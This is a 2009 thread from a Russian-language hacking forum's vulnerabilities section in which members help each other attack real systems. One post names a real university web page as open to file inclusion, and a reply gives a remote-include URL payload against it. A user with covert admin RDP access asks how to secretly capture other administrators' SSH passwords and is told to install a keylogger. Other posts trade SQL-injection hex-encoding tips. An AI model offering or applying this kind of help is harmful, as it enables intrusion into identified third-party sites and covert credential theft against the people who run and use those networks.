ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6881  
Старый 28.04.2009, 20:20
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Conroe
RTFM!!! ......читай внимательнее, и все встанет, на свои места...

Последний раз редактировалось farex; 28.04.2009 в 20:22..
 
Ответить с цитированием

  #6882  
Старый 28.04.2009, 20:30
Conroe
Новичок
Регистрация: 27.04.2009
Сообщений: 10
Провел на форуме:
48476

Репутация: 2
По умолчанию

Цитата:
Сообщение от AkyHa_MaTaTa  
Вот собственно все базы и таблички доступные тукушему юзеру(без Information):

крч ничего инетересного
З.Ы.Сорри за изврат.
чем можно получить данную информацию так быстро?

Цитата:
Сообщение от farex  
RTFM!!! ......читай внимательнее, и все встанет, на свои места...
ок, пошел читать и ковыряться..... (
 
Ответить с цитированием

  #6883  
Старый 28.04.2009, 20:33
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
www.philology.kiev.ua/php/kafkaf.php?id=7&sid=2
Инклюд. Уязвим параметр id. Но вот расскрутить не могу. Help me, please!
http://www.philology.kiev.ua/php/kafkaf.php?id=http://site.com&sid=2

на site.com, 2/stitle.txt и 2/body.txt инклудит, только текст. php нет.

sections.php не инклудит никак. надо тормошить с 2/stitle.txt и 2/body.txt
 
Ответить с цитированием

  #6884  
Старый 28.04.2009, 20:42
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 ph1l1ster:

Цитата:
URL file-access is disabled in the server configuration
 
Ответить с цитированием

узнать пароли и логины имея админ доступ через RDP
  #6885  
Старый 28.04.2009, 23:03
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
Smile узнать пароли и логины имея админ доступ через RDP

Здравствуйте!


Есть доступ по RDP администраторский (win 2003 server), сервер находится во внутренней сети (захожу через VPN). В той сети есть другие машины, на которые админы через ssh заходят с данного сервера.

Подскажите, как узнать их пароли и логины на ssh других машин?

Что поставить, что сделать, только не заметно? (доступ к системе полный)


Спасибо!
 
Ответить с цитированием

  #6886  
Старый 28.04.2009, 23:32
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Цитата:
Сообщение от fervex  
Что поставить
кейлогер.
 
Ответить с цитированием

  #6887  
Старый 29.04.2009, 13:08
Conroe
Новичок
Регистрация: 27.04.2009
Сообщений: 10
Провел на форуме:
48476

Репутация: 2
По умолчанию

как правильно задавать параметры базы и таблицы в хексе?
хекс(name_db.table_name) или hex(name_db).(table_name) ?
 
Ответить с цитированием

  #6888  
Старый 29.04.2009, 13:14
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

hex('db.table')
 
Ответить с цитированием

  #6889  
Старый 29.04.2009, 14:15
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Conroe  
как правильно задавать параметры базы и таблицы в хексе?
хекс(name_db.table_name) или hex(name_db).(table_name) ?
Где ты собрался использовать базу и таблицу в хексе?

При выборке никакого хекса быть не должно. Т.е

select user from db.users <-------- вот тут никакого хекса

Цитата:
Сообщение от ILYAtirtir  
hex('db.table')
А вот тут никаких кавычек
 
Ответить с цитированием

  #6890  
Старый 29.04.2009, 14:42
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

вообще хексить db_name.table_name - не имеет смысла(кроме подзапросов), в information_schema инфа в таком виде не хранится.
насчет
Цитата:
Сообщение от ILYAtirtir
hex('db.table')
А вот тут никаких кавычек
\stroke\не совсем согласен\stroke\
дополню для ясности.
для получения хекс значения нужно именно select hex('mydb.users'); - с кавычками. А вот для получения данных из базы с обходом смешанных коллейтов, то кавычки - не нужны.

Последний раз редактировалось geezer.code; 29.04.2009 в 15:10.. Причина: невнимательно читал
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ